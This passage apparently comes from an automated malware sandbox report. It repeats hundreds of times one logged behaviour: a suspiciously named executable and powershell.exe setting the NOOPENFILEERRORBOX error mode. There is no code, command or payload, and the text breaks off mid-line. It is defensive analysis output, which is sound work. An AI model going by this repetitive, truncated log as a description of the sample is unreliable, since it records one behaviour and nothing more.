                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
